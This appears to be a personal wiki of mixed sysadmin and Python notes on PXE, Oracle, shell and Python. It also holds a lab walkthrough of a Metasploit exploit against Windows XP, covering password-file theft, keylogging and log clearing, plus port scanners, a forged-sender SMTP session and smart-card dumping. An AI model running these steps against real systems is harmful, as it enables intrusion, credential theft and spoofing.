CC=avr-gcc
CFLAGS=-g -Os -Wall -mcall-prologues -mmcu=$(CPU)
OBJ2HEX=avr-objcopy
DFU=dfu-programmer
TARGET=port_test
upload : hex
$(DFU) $(CPU) erase
$(DFU) $(CPU) flash $(TARGET).hex
$(DFU) $(CPU) start
hex : $(TARGET).hex
%.obj : %.o
$(CC) $(CFLAGS) $< -o $@
%.hex : %.obj
$(OBJ2HEX) -R .eeprom -O ihex $< $@
clean :
rm -f *.hex *.obj *.o
}}}
!! Deploy
{{{
make hex
make upload
}}}
!LUFA
http://www.fourwalledcubicle.com/LUFA.php
edit the "makefile"s before trying demos
{{{
MCU = at90usb162
BOARD = MINIMUS
CLOCK = 16000000
}}}
when it says "no joystick bla" , try to pull it out of the demos header and source.
use other ports in order to make it working?
!Links
https://help.ubuntu.com/community/PXEInstallServer
https://wiki.koeln.ccc.de/index.php/Ubuntu_PXE_Install
http://hotfortech.wikispaces.com/how+to+PXE+the+Ubuntu+9.10+liveCD+(fog-extension)
https://help.ubuntu.com/community/PXEInstallMultiDistro
https://wiki.archlinux.org/index.php/Archiso-as-pxe-server
https://wiki.archlinux.org/index.php/Install_Arch_from_network_via_PXE
!Preconditions
{{{
pacman -S tftp-hpa dhcp
ifconfig eth0 10.42.0.1
}}}
! Dhcp Daemon
/etc/dhcpd.conf
{{{
option domain-name-servers 8.8.8.8 , 8.8.4.4;
default-lease-time 86400;
max-lease-time 604800;
authoritative;
subnet 10.42.0.0 netmask 255.255.255.0 {
range 10.42.0.10 10.42.0.149;
filename "pxelinux.0"; # the PXELinux boot agent
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.0.255;
option routers 192.168.0.1;
}
}}}
! TFTP-hpa Daemon
{{{
#
# Parameters to be passed to TFTPD
#
RUN_DAEMON="yes"
TFTPD_ARGS="-l -s /var/tftpboot"
}}}
! or just try DNSMASQ
{{{
dhcp-boot=pxelinux.0,roo,10.42.0.1
}}}
! in /var/tftpboot
TODO
Type the text for 'No.de'
! Find Oracle Home
should be, in most cases, right below {{{bin/sqlplus}}}
! Find Oracle SID
{{{
lsnrctl services
}}}
{{{
cat $ORACLE_HOME/network/admin/listener.ora
}}}
! Database encryption
!! Create new Wallet
in {{{sqlnet.ora}}}
{{{
ENCRYPTION_WALLET_LOCATION=
(SOURCE=(METHOD=FILE)(METHOD_DATA=
(DIRECTORY=/u01/app/oracle/admin/DB10G/encryption_wallet/)))
}}}
!! Set password
Wallets must be reopened after an instance restart and can be closed to prevent access to encrypted columns.
{{{
ALTER SYSTEM SET ENCRYPTION KEY AUTHENTICATED BY "myPassword";
ALTER SYSTEM SET WALLET OPEN IDENTIFIED BY "myPassword";
}}}
!! Encrypt rows
{{{
CREATE TABLE tde_test (
id NUMBER(10),
data VARCHAR2(50) ENCRYPT
)
TABLESPACE tde_test;
}}}
!! Show Encrypted Rows
{{{
SET LINESIZE 100
COLUMN owner FORMAT A15
COLUMN tble_name FORMAT A15
COLUMN column_name FORMAT A15
SELECT * FROM dba_encrypted_columns;
}}}
! Caveats
{{{
- use [ ^I] instead of \s in regex
- do not use which, use type/command -v/hash
- do not use arrays, use github.com/makefu/array instead
}}}
!Parameter Expansion
http://pubs.opengroup.org/onlinepubs/009695399/utilities/xcu_chap02.html
<html>
<table border="1" cellpadding="3" align="center">
<tr valign="top">
<th align="center">
<p class="tent"><i> </i></p>
</th>
<th align="center">
<p class="tent"><i>parameter</i></p>
</th>
<th align="center">
<p class="tent"><i>parameter</i></p>
</th>
<th align="center">
<p class="tent"><i>parameter</i></p>
</th>
</tr>
<tr valign="top">
<th align="center">
<p class="tent"><b> </b></p>
</th>
<th align="center">
<p class="tent"><b>Set and Not Null</b></p>
</th>
<th align="center">
<p class="tent"><b>Set But Null</b></p>
</th>
<th align="center">
<p class="tent"><b>Unset</b></p>
</th>
</tr>
<tr valign="top">
<td align="left">
<p class="tent"><b>${</b><i>parameter</i><b>:-</b><i>word</i><b>}</b></p>
</td>
<td align="left">
<p class="tent">substitute <i>parameter</i></p>
</td>
<td align="left">
<p class="tent">substitute <i>word</i></p>
</td>
<td align="left">
<p class="tent">substitute <i>word</i></p>
</td>
</tr>
<tr valign="top">
<td align="left">
<p class="tent"><b>${</b><i>parameter</i><b>-</b><i>word</i><b>}</b></p>
</td>
<td align="left">
<p class="tent">substitute <i>parameter</i></p>
</td>
<td align="left">
<p class="tent">substitute null</p>
</td>
<td align="left">
<p class="tent">substitute <i>word</i></p>
</td>
</tr>
<tr valign="top">
<td align="left">
<p class="tent"><b>${</b><i>parameter</i><b>:=</b><i>word</i><b>}</b></p>
</td>
<td align="left">
<p class="tent">substitute <i>parameter</i></p>
</td>
<td align="left">
<p class="tent">assign <i>word</i></p>
</td>
<td align="left">
<p class="tent">assign <i>word</i></p>
</td>
</tr>
<tr valign="top">
<td align="left">
<p class="tent"><b>${</b><i>parameter</i><b>=</b><i>word</i><b>}</b></p>
</td>
<td align="left">
<p class="tent">substitute <i>parameter</i></p>
</td>
<td align="left">
<p class="tent">substitute null</p>
</td>
<td align="left">
<p class="tent">assign <i>word</i></p>
</td>
</tr>
<tr valign="top">
<td align="left">
<p class="tent"><b>${</b><i>parameter</i><b>:?</b><i>word</i><b>}</b></p>
</td>
<td align="left">
<p class="tent">substitute <i>parameter</i></p>
</td>
<td align="left">
<p class="tent">error, exit</p>
</td>
<td align="left">
<p class="tent">error, exit</p>
</td>
</tr>
<tr valign="top">
<td align="left">
<p class="tent"><b>${</b><i>parameter</i><b>?</b><i>word</i><b>}</b></p>
</td>
<td align="left">
<p class="tent">substitute <i>parameter</i></p>
</td>
<td align="left">
<p class="tent">substitute null</p>
</td>
<td align="left">
<p class="tent">error, exit</p>
</td>
</tr>
<tr valign="top">
<td align="left">
<p class="tent"><b>${</b><i>parameter</i><b>:+</b><i>word</i><b>}</b></p>
</td>
<td align="left">
<p class="tent">substitute <i>word</i></p>
</td>
<td align="left">
<p class="tent">substitute null</p>
</td>
<td align="left">
<p class="tent">substitute null</p>
</td>
</tr>
<tr valign="top">
<td align="left">
<p class="tent"><b>${</b><i>parameter</i><b>+</b><i>word</i><b>}</b></p>
</td>
<td align="left">
<p class="tent">substitute <i>word</i></p>
</td>
<td align="left">
<p class="tent">substitute <i>word</i></p>
</td>
<td align="left">
<p class="tent">substitute null</p>
</td>
</tr>
</table>
<dl compact>
<dt>${<i>parameter</i>:-<i>word</i>}</dt>
<dd>
In this example, <a href="../utilities/ls.html"><i>ls</i></a> is executed only if <i>x</i> is null or unset. (The $( <a href=
"../utilities/ls.html"><i>ls</i></a>) command substitution notation is explained in <a href="#tag_02_06_03">Command
Substitution</a>.)
<blockquote>
<pre>
<tt>${x:-$(ls)}
</tt>
</pre>
</blockquote>
</dd>
<dt>${<i>parameter</i>:=<i>word</i>}</dt>
<dd>
<pre>
<tt>unset X
echo ${X:=abc}
</tt><b>abc</b>
</pre>
</dd>
<dt>${<i>parameter</i>:?<i>word</i>}</dt>
<dd>
<pre>
<tt>unset posix
echo ${posix:?}
</tt><b>sh: posix: parameter null or not set</b>
</pre>
</dd>
<dt>${<i>parameter</i>:+<i>word</i>}</dt>
<dd>
<pre>
<tt>set a b c
echo ${3:+posix}
</tt><b>posix</b>
</pre>
</dd>
<dt>${#<i>parameter</i>}</dt>
<dd>
<pre>
<tt>HOME=/usr/posix
echo ${#HOME}
</tt><b>10</b>
</pre>
</dd>
<dt>${<i>parameter</i>%<i>word</i>}</dt>
<dd>
<pre>
<tt>x=file.c
echo ${x%.c}.o
</tt><b>file.o</b>
</pre>
</dd>
<dt>${<i>parameter</i>%%<i>word</i>}</dt>
<dd>
<pre>
<tt>x=posix/src/std
echo ${x%%/*}
</tt><b>posix</b>
</pre>
</dd>
<dt>${<i>parameter</i>#<i>word</i>}</dt>
<dd>
<pre>
<tt>x=$HOME/src/cmd
echo ${x#$HOME}
</tt><b>/src/cmd</b>
</pre>
</dd>
<dt>${<i>parameter</i>##<i>word</i>}</dt>
<dd>
<pre>
<tt>x=/one/two/three
echo ${x##*/}
</tt><b>three</b>
</pre>
</dd>
</dl>
<p>The double-quoting of patterns is different depending on where the double-quotes are placed:</p>
<dl compact>
<dt><tt>"${x#*}"</tt></dt>
<dd>The asterisk is a pattern character.</dd>
<dt><tt>${x#"*"}</tt></dt>
<dd>The literal asterisk is quoted and not special.</dd>
</dl>
</html>
!Arithmetic Expressions
<html>
<p><tt>A simple example using arithmetic expansion:</tt></p>
<blockquote>
<pre>
<tt># repeat a command 100 times
x=100
while [ $x -gt 0 ]
do
</tt> <i>command</i> <tt> x=$(($x-1))
done
</tt>
</pre>
</blockquote>
</html>
! Pipelines
Both expressions write "bar"
{{{
false && echo foo || echo bar
true || echo foo && echo bar
}}}
{{{
while
# a couple of <newline>s
# a list
date && who || ls; cat file
# a couple of <newline>s
# another list
wc file > output & true
do
# 2 lists
ls
cat file
done
}}}
! tcpdump
{{{
# full packet sniff, avoid truncate
tcpdump -i eth- -w out.pcap -s 0
}}}
!OpenPS2Loader
Download: http://bitbucket.org/ifcaro/open-ps2-loader
! Installing Games
get it from the bundle
{{{ iso2opl ISO INSTALLPATH GAMENAME [DVD|CD] }}}
! fix ul.cfg
!! deleting a game
{{{ vim -b}}}
64x before the entry you want to delete
!! fixing DVD|CD
DVD is 0x14 and right behind the filename entry
CD is 0x12
switch them with hexedit
Mostly Code snippets:
[[CPP]]
[[Python2]]
[[bash]]
[[node.js]]
[[POSIX Shell]]
[[ruby]]
[[powershell]]
! Python for the user
in ~/.profile
{{{
export PYTHONPATH=~/.local/lib/python2.7/site-packages
export PATH=$PATH:~/.local/lbin
}}}
then do
{{{
pip install --user <stuff>
}}}
! Interactive Shell
!! Activate Tab Completion
{{{
import rlcompleter,readline;readline.parse_and_bind("tab: complete")
}}}
! Single file Python
!! py2zip
from http://people.canonical.com/~roman.yepishev/us/src/
{{{
#!/bin/bash
ORIG_PWD=$PWD
set -ex
TARGET="$1"
TARGET_BASENAME=`basename "$TARGET"`
shift
MAIN=$1
shift
FILES="$*"
TEMPDIR=`mktemp -d /tmp/XXXXXXXX`
cp "$MAIN" "$TEMPDIR/__main__.py"
cp --parents -r $FILES "$TEMPDIR/"
cd "$TEMPDIR"
zip -q -r build.zip *
cd "$ORIG_PWD"
echo "#!/usr/bin/python" > "$TEMPDIR/build.header"
cat "$TEMPDIR/build.header" "$TEMPDIR/build.zip" > "$TEMPDIR/$TARGET_BASENAME"
chmod +x "$TEMPDIR/$TARGET_BASENAME"
mv "$TEMPDIR/$TARGET_BASENAME" $TARGET
}}}
!Conditionals
{{{
>>> x = 5
>>> 1 < x < 10
True
>>> 10 < x < 20
False
>>> x < 10 < x*10 < 100
True
>>> 10 > x <= 9
True
>>> 5 == x > 4
True
}}}
!Random
{{{
from random import random
seed() # which seed to use
randint(a,b) # int between a and b
randrange(start,stop,step) # like choice(range(start,stop,step))
hoice(seq) # random choice from sequence
shuffle(x) # shuffles sequence
sample(seq,num) # choose num samples
uniform() # float between a and b
}}}
!Decorators
{{{
def print_args(function):
def wrapper(*args, **kwargs):
print 'Arguments:', args, kwargs
return function(*args, **kwargs)
return wrapper
@print_args
def write(text):
print text
>>> write('foo')
Arguments: ('foo',){}
foo
}}}
!Advanced Regexes
{{{
re.compile("^\[font(?:=(?P<size>[-+][0-9]{1,2}))?\](.*?)[/font]",
re.DEBUG)
}}}
!General
{{{
id(obj) -- returns the address of the object
help(obj) -- returns help for the object
dir(obj) -- returns what the obj provides
#### counter loop
for i in range(5):
print i
#### Just run code when called directly
if __name__ == '__main__':
main()
# swap vars
a,b,c = c,a,b
}}}
!Dictionaries
{{{
# var in dict
print d.get('key','not found')
# dictionary has key
dict().has_key(k)
# intersection
print "Intersects:", [k for k in some_dict if k in another_dict]
}}}
!Loops
{{{
for k,v in dict.iteritems():
print k,v
for i,v in enumerate(dict):
print "item no.",i,"value: ",v
}}}
!quick Random String
{{{
hashlib.md5(str(random.random()).encode()).hexdigest()[:11]
or
base64.b64encode(str(random.random()))[:-1]
}}}
! Port Scanner
{{{
python2 -c "from socket import socket;from sys import exit;exit(socket().connect_ex(('$HOST',$PORT)))"
}}}
!pdb
{{{
import pdb
pdb.set_trace()
}}}
!ipython debugging
{{{
ipython --pylab
plot(list)
%pdb on
import pdb
pdb.run('class.function()')
import profile
profile.run('class.function()')
}}}
!ipython enhanced pdb
{{{
from IPython.Debugger import Tracer; debug_here = Tracer()
debug_here()
#in shell
run -d -b 3 proggy
# s for debug
# b for new breakpoint
}}}
! Log to Syslog
{{{
import logging, logging.handlers
logger = logging.getLogger("a_name")
hdlr = logging.handlers.SysLogHandler(
facility=logging.handlers.SysLogHandler.LOG_DAEMON)
formatter = logging.Formatter(
'%(filename)s: %(levelname)s: %(message)s')
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
}}}
!SMTP
http://docs.python.org/library/smtplib.html
{{{
import sys, smtplib,string
fromaddr = raw_input("From: ")
toaddrs = string.splitfields(raw_input("To: "), ',')
msg = ("From: %s\r\nTo: %s\r\n\r\n"
% (fromaddr, ", ".join(toaddrs)))
print "Enter message, end with ^D:"
msg = ''
while 1:
line = sys.stdin.readline()
if not line:
break
msg = msg + line
# The actual mail send
server = smtplib.SMTP('localhost')
#server.login(user,pass)
server.sendmail(fromaddr, toaddrs, msg)
server.quit()
}}}
!POP3
http://docs.python.org/library/poplib.html
{{{
import getpass, poplib
M = poplib.POP3('localhost')
M.user(getpass.getuser())
M.pass_(getpass.getpass())
numMessages = len(M.list()[1])
for i in range(numMessages):
for j in M.retr(i+1)[1]:
print j
}}}
!imap4
http://docs.python.org/library/imaplib.html
{{{
import getpass, imaplib
M = imaplib.IMAP4()
M.login(getpass.getuser(), getpass.getpass())
M.select()
typ, data = M.search(None, 'ALL')
for num in data[0].split():
typ, data = M.fetch(num, '(RFC822)')
print 'Message %s\n%s\n' % (num, data[0][1])
M.close()
M.logout()
}}}
{{{
modules : lowercase+short
classes : CapWords
Exceptions : CapsWords+Error
Functions : self for instance, cls for classvar
method+ : leading _ for non-public
instance : lowercase seperated by underscore when necessary
Global : like class
constants : CAPS_LOCK
}}}
{{{
import signal,os
# handler function
def handler(signum,frame):
print 'something happened'
# register signal
signal.signal(signal.SIGALRM,handler)
# send sigalrm in 5 seconds
signal.alarm(5)
}}}
{{{
int (string ) -- integer to string
str.encode('rot13') -- encode string to rot13
str.split() -- splits at SPACE, takes optional token
shlex.split(str) -- tokenizes in shellstyle( "bla bla" stays together)
chr(NUM) => Character
ord('a') => Integer
#Centering Command Line
print '|', 'hej'.ljust(20,'+'), '|', 'hej'.rjust(20,'-'), '|', 'hej'.center(20,'*), '|'
#Format Strings (old Style)
print "string %s float %.3f" % (string, float)
}}}
!String Templates
{{{
s = Template("$who is $what")
s.substitute(who="bob", what="teh sux") -- crashes when not enough params
s.safe_substitute() -- keeps not substituted identifier intact
}}}
!Lightweight Threads Based
{{{
#!/usr/bin/python
# -- basics --
# all internal python operations are thread safe and use the same internal lock
# -- timer --
# do something after a specified time
import threading.Timer
def hello():
print "hello, world"
t = threading.Timer(30.0, hello)
t.start() # after 30 seconds, "hello, world" will be printed
# -- Thread for function --
from threading import Thread
def f1(a):
print "ass"
return a
b = 1
t_f1 = Thread(target = f1, args = (b,))
t_f1.start()
# ( e.g. thread in endless loop )
class loopthread(Thread):
def __init__(self,bla):
Thread.__init__(self)
def threadLoop(self):
while 1:
# you might also want aquire and lock here
if self.loopon==0:
break
#...do stuff...
def stopThread(self):
self.loopon=1
self.thread1.join() # wait for finish
}}}
!Multiprocessing
http://docs.python.org/library/multiprocessing.html
{{{
p = Pool(5)
def f(x):
return x*x
p.map(f, [1,2,3])
}}}
!Process creation
http://docs.python.org/library/subprocess.html
{{{
"""
subprocess.
Popen(["/bin/ls", "-l") # has many bonus parameters, asynchronous call
call(["/bin/ls", "-l"]) # waits for the program to stop
Popen.
poll() # checks if process terminated already
wait() # waits for process to finish
communicate(input=None) # interact with process via stdin, read from stdout,stderr, waits for process to finish
# returns tuple (outdata,indata) needs Popen to have stdin=PIPE,etc..
send_signal(SIGX)
terminate() # SIGTERM
kill() # SIGKILL
stdin # pipes when Popen is called with stdin=PIPE, etc..
stdout/stderr
pid #process id
"""
# -- examples --
# pipeline
p1 = Popen(["dmesg"], stdout=PIPE)
p2 = Popen(["grep", "hda"], stdin=p1.stdout, stdout=PIPE)
output = p2.communicate()[0]
# backquote ( a=`ls -l` )
output = Popen(["ls", "-l"], stdout=PIPE).communicate()[0]
# os.system()
retcode = call("mycmd" + " myarg", shell=True)
if retcode < 0:
#signal under UNIX
else:
#returncode
pass
# environmental variables
Popen(["/bin/mycmd", "myarg"], env={"PATH": "/usr/bin"})
}}}
{{{
import curses
from curses.wrapper import wrapper
def main(stdscr):
curses.noecho() #normally do not echo keystrokes
curses.cbreak() #not buffer input
stdscr.keypad(1) # return special values
curses.nocbreak(); stdscr.keypad(0); curses.echo();curses.endwin() #return to normal
if __name__ == '__main__':
wrapper(main)
}}}
!Texbox
{{{
import curses
from curses.wrapper import wrapper
from curses.textpad import Textbox
def main(stdscr):
curses.noecho() #normally do not echo keystrokes
curses.cbreak() #not buffer input
stdscr.keypad(1) # return special values
curses.init_pair(1,curses.COLOR_GREEN,curses.COLOR_BLUE)
curses.init_pair(2,curses.COLOR_YELLOW,curses.COLOR_BLACK)
stdscr.bkgd(curses.color_pair(2))
stdscr.box()
stdscr.refresh()
win1 = curses.newwin(20,40,10,5)
win1.bkgd(curses.color_pair(1))
win1.refresh()
win2 = curses.newwin(20,40,10,50)
win2.bkgd(curses.color_pair(2))
win2.refresh()
textbox = Textbox(win1)
text = textbox.edit()
win2.addstr(0,0,text)
win2.refresh()
# Displays a section of the pad in the middle of the screen
c = stdscr.getch()
curses.nocbreak(); stdscr.keypad(0); curses.echo();curses.endwin() #return to normal
if __name__ == '__main__':
wrapper(main) #supplies stdscr
}}}
[[Python Strings]]
[[Python Basics]]
[[Python Advanced]]
[[Python Debugger]]
[[Python Mail]]
[[Python Naming Conventions]]
[[Python Threading and Process Creation]]
[[Python Signals]]
[[Python Code Snippets]]
[[Python Logging]]
!GUI
[[Python curses]]
[[wxPython]]
[[Tkinter]]
! Kickstart for installation
In CD Rom Boot Menu:
{{{
linux ks=http://192.168.0.10:8001/ks.cfg
}}}
On 192.168.0.10
{{{
cat >ks.cfg <<EOF
install
cdrom
key --skip
lang en_US.UTF-8
keyboard us
xconfig --startxonboot
network --device eth0 --bootproto static --ip 172.29.174.238 --netmask 255.255.255.240 --gateway 172.29.174.225 --hostname BBMS-101
rootpw --iscrypted $6$KbJWSNaf$tDaVXxtUw1nEH5mtutGd6hnpzZQbKmFw9hq2E0gNHp9m5IAm9h8KxZVB3bxdnelOJ0I9.CbGTw4qSIoc/rsix
firewall --enabled --port=22:tcp
reboot
authconfig --enableshadow --enablemd5
selinux --enforcing
timezone --utc Europe/Berlin
bootloader --location=mbr --driveorder=hda --append="rhgb quiet"
clearpart --linux --all --initlabel
part /boot --fstype ext3 --size=1024 --ondisk=hda --asprimary
part pv.4 --size=100 --grow --ondisk=hda
#volgroup raid10_vg1 --pesize=32768 pv.15
volgroup raid1_vg0 --pesize=32768 pv.4
logvol /var --fstype ext3 --name=var --vgname=raid1_vg0 --size=5240
logvol / --fstype ext3 --name=root --vgname=raid1_vg0 --size=5000
logvol /tmp --fstype ext3 --name=tmp --vgname=raid1_vg0 --size=2048
logvol /var/log/audit --fstype ext3 --name=var_log_audit --vgname=raid1_vg0 --size=1120
logvol /var/log --fstype ext3 --name=var_log --vgname=raid1_vg0 --size=2000
%packages
@admin-tools
@base
@core
@dialup
@editors
@gnome-desktop
@games
@graphical-internet
@graphics
@java
@legacy-software-support
@office
@printing
@sound-and-video
@text-internet
@base-x
kexec-tools
iscsi-initiator-utils
fipscheck
device-mapper-multipath
sgpio
emacs
libsane-hpaio
xorg-x11-utils
xorg-x11-server-Xnest
EOF
python -m http.server 8001
}}}
! Install Only Security Patches
{{{
yum install yum-security
yum list-security
yum --security check-update
yum update --security
}}}
Sun Apr 18 2010 :
install aur rt2870
# in /etc/modprobe/wireless.conf
{{{
blacklist rt2800usb, rt2x00usb , rt2x00lib
}}}
then REBOOT
!pcsc SmartCard Reader
{{{
bb -S pcsc-perl pcsclite pcsc-tools
/etc/rc.d/pcscd start
pcsc_scan
}}}
! install
yaourt -S libfreefare mfoc
!! Dump Mifare Classic
{{{
mfoc -O here2.dump
}}}
!!get Serial Number of the card
{{{
echo FFCA000000 | scriptor
}}}
Commands : http://www.wrankl.de/SCTables/SCTables.html
Tutorial DESFire
http://ridrix.wordpress.com/2009/09/19/mifare-desfire-communication-example/
!ctapi
{{{
bb -S ctapi-cyberjack hal
/etc/rc.d/hal restart
dbus-daemon --system
cyberjack
}}}
!rfidiot
http://rfidiot.org
!!prereq
download and install pyscard
download rfidiot
!!patching
{{{
# in RFIDIOtconfig.py
> readernum = 0
# in RFIDIOt
> if readernum > len(self.pcsc)
>self.readername = str(self.pcsc[readernum])
> #self.pcsc_connection.disconnect()
}}}
!! Passport
extract Certificate and picture
{{{
python2 mrpkey.py "lower line of the passport"
}}}
! Write basic SMTP
{{{
$ telnet hoemail1.alcatel.com 25 1 ↵
Trying 192.160.6.148...
Connected to hoemail1.alcatel.com.
Escape character is '^]'.
220 hoemail1.alcatel.com ESMTP Mon, 10 Jun 2013 06:59:32 -0500 (CDT)
HELO me.lolwutland.com
250 hoemail1.alcatel.com Hello [192.40.56.122], pleased to meet you
MAIL FROM:<bill@microsoft.com>
250 2.1.0 <bill@microsoft.com>... Sender ok
RCPT TO:<christopher.gregorian@alcatel-lucent.com>
250 2.1.5 <christopher.gregorian@alcatel-lucent.com>... Recipient ok
DATA
354 Enter mail, end with "." on a line by itself
From:<bill@microsoft.com>
To:<christopher.gregorian@alcatel-lucent.com>
Subject: Job Offer
Get a great job at Microsoft!
.
250 2.0.0 r5ABxW2G028697 Message accepted for delivery
}}}
mwmap -- map network from pcap -- http://sourceforge.net/projects/nwmap/
mz -- mausezahn fast packet forgery -- http://www.perihel.at/sec/mz/
! Penetration Testing
!! Web Penetration Testing
!!! SQL Injection
http://sqlmap.sourceforge.net/
http://sqlninja.sourceforge.net/
!!! Proxies
Zed Attack Proxy - http://code.google.com/p/zaproxy/
!!! Education
http://www.darknet.org.uk/2011/04/bodgeit-store-vulnerable-web-application-for-penetration-testing/
[[Hardening]]
[[SecTools]]
[[Exploits]]
[[Evasion]]
[[Security Demo]]
[[Contracts]]
[[MS Windows]]
! Cloud Services
[[Dotcloud]]
[[No.de]]
! Evasion
[[DNS TUNNEL]]
! Defense
[[honeyd]]
! USB stuff
[[u3-tool]]
! Basics
[[SMTP]]
! Aufbau
Laptop1: 192.168.100.23
> Backtrack : 192.168.100.5
Laptop2: 192.168.100.42
> Windows XP Service Pack 0 : 192.168.100.2
{{{ alias nmap='nmap -T insane ' }}}
! 1. Footprinting
{{{
Soviele informationen ausfindig machen uber das Ziel wie moeglich,
soziale webseiten, suchmaschinen, DNS eintraege, etc.
Moegliche Ziele ausfindig machen
! 2. Scanning and Enumeration
{{{
nmap -sP 192.168.100.* // Pingscan - unauffaelliger Scan um zu
nmap -A 192.168.100.2 // winxp sp0
nmap -A 192.168.100.42 // winxp sp3
}}}
! 3. Hacking and Exploitation
{{{
msfconsole
use exploit/windows/smb/ms04_011_lsass
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST 192.168.100.2
exploit // geschafft!
// schauen was es so gibt auf dem Computer
cd "../../Documents and Settings/Administrator/My Documents"
cat passwoerter.txt
download passwoerter.txt
//Keylogger
keyscan_start
// Eingabe credentials in Messenger
keyscan_dump
keyscan_stop
}}}
! 4. Privilege Escalation
{{{
ps // finde explorer.exe PID
migrate PID // Schadcode in Prozess verstecken,
// dessen Rechte und Eigenschaften annehmen (Zugriff auf Grafische Oberflaeche)
execute -f calc // nur "Taschenrechner" ausfuehren, kann aber alles sein
screenshot // image von Desktop
set RHOST 192.168.100.1 // gepatchtes Windows
}}}
!5. Covering Tracks
{{{
// auch noch rootkits/backdoors pflanzen fuer spaeteren zugriff
clearev
// ausweitung des angriffs auf weitere computer im netzwerk
shutdown
}}}
! cool Tools
qmv - qewl graphical win
rlwrap - linewrapper
!! parallel stuff
{{{
seq -w 19 |
parallel wget http://hackermonthly.com/xmas/hackermonthly-issue0{}.zip
wget -P4 -n1 http://hackermonthly.com/xmas/hackermonthly-issue0{01..19}.zip
}}}
! Firmware Update
http://www.siliconimage.com/support/searchresults.aspx?pid=28&cat=15
take
{{{BIOS Update Utility for DOS}}}
and :
{{{SiI3114 IDE, SATARAID5 and system BIOS}}}
!! In Freedos
{{{
updflash b5403.bin -a -d -v -ID3114 -u
}}}
For non-raid Mode
see [[HDD encryption]]
! Tweaks
If Raid is slow, try
{{{
echo 16384 | sudo tee /sys/block/md<X>/md/stripe_cache_size
}}}
If this works
{{{
cat >/etc/udev/rules.d/60-md-stripe-cache.rules <<EOF
SUBSYSTEM=="block", KERNEL=="md*", ACTION=="change", TEST=="md/stripe_cache_size", ATTR{md/stripe_cache_size}="16384"
EOF
}}}
* [[HDD encryption]]
* [[habanero]]
* [[cygwin]]
* [[Fahrrad]]
* [[Network Boot]]
* [[Amazon Web Service]]
* [[Dropbox]]
* [[UbuntuOne]]
* [[firefox]]
* [[mysql]]
* [[Anschriften]]
* [[einkaufen]]
* [[vhosts]]
* [[Dealextreme]]
* [[CSS]]
* [[evdev]]
! Installation
!! ubuntu 12.04
{{{
aptitude install g++ python-pip python-dev
pip install twisted pyasn1
pip install allmydata-tahoe
}}}
{{{
#!/bin/bash
if ! [ "$1" ];
then
echo "no pixelsize set"
exit 1
fi
#printf '\33]50;%s%d\007' "xft:Terminus:pixelsize=" $1
}}}
!Basic Sample
{{{
from Tkinter import *
class App(Frame):
def say_hi(self):
print "hi"
def createWidgets(self):
self.QUIT = Button(self)
self.QUIT['text'] = 'aidsballs'
self.QUIT['fg'] = 'red'
self.QUIT['command'] = self.quit
self.QUIT.pack({'side' : 'left'})
self.hi= Button(self)
self.hi['text'] = 'hi'
self.hi['command'] = self.say_hi
self.hi.pack({'side' : 'left'})
def __init__(self,master=None):
Frame.__init__(self,master)
self.pack()
self.createWidgets()
root = Tk()
app = App(master=root)
app.mainloop()
root.destroy()
}}}
!Grid Layout
{{{
from Tkinter import *
a = Frame(root)
frame.columnconfigure(0,weight=1) # make the column 0 stretchy horizontally
frame.rowconfigure(0,weight=1) # make row 0 stretchy vertically
b = Label(a,text='bob')
b.grid(row=0,column=0,sticky=N+S+W) # stretch out vertically and be alligned at the left side
}}}
! filesystem
!! /etc/fstab
add discard to options
{{{
/dev/mapper/main-root / ext4 rw,noatime,discard 0 1
}}}
! LUKS
!! grub with crypto-root
in {{{/etc/default/grub}}}
{{{
GRUB_CMDLINE_LINUX="init=/usr/lib/systemd/systemd cryptdevice=/dev/sda2:main:allow-discards elevator=noop"
}}}
!! cryptsetup
{{{
cryptsetup luksOpen --allow-discards /dev/sdx main
}}}
! LVM
!! /etc/lvm/lvm.conf
{{{
#enable
issue_discards
}}}
! manual trim
{{{
fstrim -v <mountpoint>
}}}
! internet forwarding
see [[Network Boot]] for DHCP Daemon configuration
{{{
#!/bin/bash
device=ppp0
#DHCP-Serverstarten
/etc/rc.d/dhcpd restart
echo 1 > /proc/sys/net/ipv4/ip_forward
echo 1 > /proc/sys/net/ipv4/ip_dynaddr
iptables -A POSTROUTING -t nat -o $device -j MASQUERADE
#iptables -A INPUT -m state --state NEW,INVALID -i $device -j DROP
#iptables -A FORWARD -m state --state NEW,INVALID -i $device -j DROP
}}}
- to use with [[Duply]]
{{{
wget http://people.canonical.com/~roman.yepishev/us/ubuntuone-sso-login.py
# source: http://people.canonical.com/~roman.yepishev/us/src/
pacman -S python2-oauth
python2 ubuntuone-sso-login.py
# add oauth=.... to .duply/one/conf
}}}
! Home-Grown Port Scanner
!! Bash
{{{
HOST=127.0.0.1;for((port=1;port<=65535;++port));do echo -en "$port ";if exec 5<>/dev/tcp/$HOST/$port 2>/dev/null;then echo -en "\n\nport $port/tcp is open\n\n";fi;done
HOST=127.0.0.1;for p in {0..65535};do((bash -c "(>/dev/tcp/$HOST/$p)" 2> /dev/null && echo open: $p)&read -t0.1;kill $! 2>/dev/null)2>/dev/null;done
}}}
!! Shell + Telnet
also see http://www.gnucitizen.org/blog/agile-hacking-a-homegrown-telnet-based-portscanner/
{{{
HOST=127.0.0.1;for((port=1;port<=65535;++port));do echo -en "$port ";if echo -en "open $HOST $port\nlogout\quit" | telnet 2>/dev/null | grep 'Connected to' > /dev/null;then echo -en "\n\nport $port/tcp is open\n\n";fi;done
}}}
!! Perl
{{{
use strict;
use IO::Socket;
my ($target,$remote,$results,$port,@ports);
unless (@ARGV > 0) { die "usage: $0 [ip]" }
$target = shift(@ARGV);
for ($port = 0; $port<65536; $port++)
{
$remote = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $target,
PeerPort => $port,
);
if ($remote) {print "$port is open\n" };
}
}}}
! Default route via SSH
see more https://wiki.archlinux.org/index.php/VPN_over_SSH#OpenSSH.27s_built_in_tunneling
!! using pvpn
!!! prepreqs
{{{
GNU/Linux
OpenSSH
pppd
bash
iproute2
dnsutils (dig(1))
asciidoc
(make)
(binutils)
}}}
!!! server side
{{{
echo "PermitTunnel yes" >> /etc/ssh/sshd_config
# deploy client pubkey for root
echo "PermitRootLogin without-password" >> /etc/ssh/sshd_config
echo "net.ipv4.ip_forward=1" >> /etc/sysctl.conf
echo "iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE" >> /etc/rc.local
}}}
!!! client side
{{{
yaourt -S pvpn
ssh-copy-id root@host
pvpn -t ssh-3 root@host default
